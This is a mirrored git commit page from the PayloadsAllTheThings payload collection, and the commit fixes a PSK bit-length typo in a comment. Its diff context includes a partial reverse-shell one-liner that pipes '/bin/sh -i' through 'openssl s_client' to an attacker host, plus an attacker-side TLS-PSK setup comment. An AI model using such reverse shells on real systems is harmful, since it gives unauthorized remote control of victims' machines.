mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-20 05:36:06 +00:00
fix typo
This commit is contained in:
parent
2d7d6d6eed
commit
62443a3753
@ -177,7 +177,7 @@ user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -
|
||||
|
||||
TLS-PSK (does not rely on PKI or self-signed certificates)
|
||||
```bash
|
||||
# generate 48-bit PSK
|
||||
# generate 384-bit PSK
|
||||
# use the generated string as a value for the two PSK variables from below
|
||||
openssl rand -hex 48
|
||||
# server (attacker)
|
||||
|
Loading…
Reference in New Issue
Block a user